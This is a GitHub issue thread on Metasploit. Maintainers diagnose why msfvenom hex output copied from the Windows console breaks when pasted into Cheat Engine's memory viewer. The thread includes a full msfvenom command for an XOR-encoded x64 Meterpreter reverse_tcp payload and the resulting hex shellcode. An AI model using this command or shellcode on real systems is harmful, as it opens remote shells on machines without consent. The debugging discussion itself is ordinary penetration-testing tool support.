Metasploit-framework: msfvenom hex payload code error

Sorry, your video and description do not say how you are launching the payload at all. I see some sort of 'memory viewer' console, where you appear to be pasting things, and jumping to an offset. Can you please provide steps that we can reproduce?

full video:
https://youtu.be/fJvD3KIHTvo

kali linux msfvenom-> hex code generater -> no bug

windows msfvenom ->hex code generater -> bug

windows test msfvenom

http://windows.metasploit.com/metasploitframework-latest.msi

Hi @kainpark7894, when you executed the 4.11.20 payload, were you also using Framework 4.11.20? Or were you using 4.11.26 as you said earlier?

my bad test -> 4.1.1.20 ->kali linux msfvenom
(Windows msfvenom hex generater bug?)

linux msfvenom hex generater no bug

OK, thanks for the information.

By the way, thanks for trying to communicate in English. But if you want, you can speak Korean. We can translate with Google :-)

How did you copy the hex output? Did you write it to a file, or try to copy from the console output in the cmd window? I wonder if not all of the characters got copied when you selected it accidentally.

@bcook-r7 The video shows he right-clicked on the hex payload from this Github issue to copy, and then pasted to Memory Viewer.

When I copied from your output above, the non-working one has linefeeds between each line, but the working one is a single continuous line. There is also a difference of 16 bytes between them. This makes me think the copy/paste method you are using is adding some extra characters to the payload when you paste it.

$ wc good.txt  
       1       1    1263 b.txt
$ wc bad.txt  
      16      16    1278 a.txt

Ah good one.

See my screenshot. Not sure if cheat engine will automatically ignore the new lines.

I'm pretty sure it does?

The shell code looks the same other than the line feeds. -> nvm edit: shell code is different.

I did a quick diff in HXD and it looks quite different. What I don't get is, if it's XOR'd with \x00 then it should have same shell code. The stub remains the same though.

His working: https://www.onlinedisassembler.com/odaweb/E7FmQDHs/0

His not working: https://www.onlinedisassembler.com/odaweb/m1CU6tnW/0

I'll test it out right quick....

Ahh yup, @bcook-r7 you might be right. When there is a newline, Memory Viewer/Cheat Engine treats that as a null byte.

The following screenshot is what the hex output actually looks like. I copied from this Github issue (the bad hex payload):

Pay attention to the last couple of bytes in the first line. We are gonna try to find that in Memory Viewer:

Notice in Memory Viewer, there is a null byte (00) between B5 and E2. That null byte should NOT be there.

I generated the exact same thing with the latest msfvenom, and there is no beautification, so looks like there is no problem with Framework. However, this was done on OS X, I don't know if Windows does anything different (and that's what @kainpark7894 used)

Ok, so I tried to generate the same payload on Windows:

And if you select the output, right click, and paste it on a text editor, it looks like this:

@kainpark7894 When using msfvenom on Windows, did you copy the hex payload from the command prompt? If you did, that's the problem.

To work around that, do:

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -b '\x00' -i 3 LHOST=192.168.0.2 LPORT=443 -f hex -o payload.txt

The hex payload saved as payload.txt will not have any newlines (null bytes). See if that fixes your problem :-)

Yeah, we don't have a lot of control over how cmd.exe handles copy/paste. I think you even get different results on Windows 10's console vs. earlier versions of windows.

wchen-r7 thank you

cmd console -hex bug ?

msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor -b '\x00' -i 3 LHOST=192.168.0.2 LPORT=443 -f hex -o test.txt

4831c94881e9b6ffffff488d05efffffff48bb0a8c02199a7c0cdf48315827482df8ffffffe2f442bdcb511b95b720f5734a949f93f320f5c4b9e0ac54645934765951ab242b972774fde6659ef86e0d6d221e4d46a8d9c3ece79a4b79a8d9741f0944be42a9bc8f0322aefca11f0bc45b95604672c8b5a58464eddb2134fd6731d555457062b517b2f14d9c7354b5ad328c4d9c7314b5ad12c44d18967eb76b515d4d26e198c1471c96293760f5342b2195c4f5cc66bc77281f5737aa76c16e61446396592cf6246f117717213476a6e894051769b13d5207dc04c771bfb53e241f453768352dc536dcfade60bfc9ae2895d35a10fdb517a03844d6e839bc27a1ace562d078fe6a449c402ef041257e241f453368352d40211f095f65bfbd3a2995d556aa30756e6144444f606ca37f3ad55d567875a76ee378255673cb1d7e21cd5f5faa26146d9f6bfa4a688a8a5552cb36252134bc70291de35fa0d85d2760944c9ec47d41246095bed78934ff6734dd8cf36dbd0c67dad8723126cb286ae97e6d162034fd7f212e2c974a3402f30a9144497164b017a9d934d769cb3d6ee9564de8e17c74e7212eef18fed402f3281dc27d3175a56ae9764d9ed87547bfc5e064e8f4b13d526addfad954d115b56094055fa2d8ed6ee9764826e85ef96738dc8cee608effffa8cbfac2a2ccfd5835dc86d3016a74d00ad4444e4934ed2660d55d5fa8c6b517a9d5bf4f856718d9b5dc8cd468bd3a6b515d4c9ed17c74fc281dfc569b3624ee3f6bd094d934800e38d5524e4934bd2660d55d7d216ebc9c6bbb0a27dee1aa7f212e70796c5502f3296bcbfe1dcb02d92895c65f08f2b5a396e1b156ded3a54c60cd4cd0e3c44884366bd0172157df

////////////////////////////////////
i solve a problem

Darn hexbugs